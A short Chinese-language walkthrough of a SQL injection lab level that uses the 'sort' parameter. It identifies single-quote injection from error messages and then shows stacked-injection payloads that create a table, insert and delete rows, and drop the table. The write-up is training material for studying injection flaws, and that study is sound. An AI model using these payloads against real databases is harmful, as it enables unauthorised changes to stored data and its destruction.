这一关的欢迎界面依然是以sort作为注入点
我们首先来判断一下是否为数字型注入 输入如下
sort=rand()对尝试几次 发现页面并没有发生变化 说明这道题的注入类型属于字符型
然后尝试输入以下内容
sort=1'报错了 报错信息如下 我们从报错信息可以知道这道题的注入类型属于单引号注入
佐证一下呗 尝试输入以下内容
sort=1'--+存在正确回显 说明我们的判断是正确的
然后我们这一关存在报错信息 所以我们可以使用报错注入进行爆破操作 这里我就不演示了 我演示一下堆叠注入
首先进行创建表格 输入如下
sort=1';create table demo like users;--+数据库的回显如下所示
接着进行添加数据的操作 输入如下
sort=1';insert into demo values(1,'xiaoxu','999');--+数据库的回显如下所示
接着进行删除数据操作 输入如下
sort=1';delete from demo where id=1;--+数据库的回显如下所示
最后进行删除表格的操作 输入如下
sort=1';drop table demo;--+数据库的回显如下所示
成功闯关嗨嗨!!
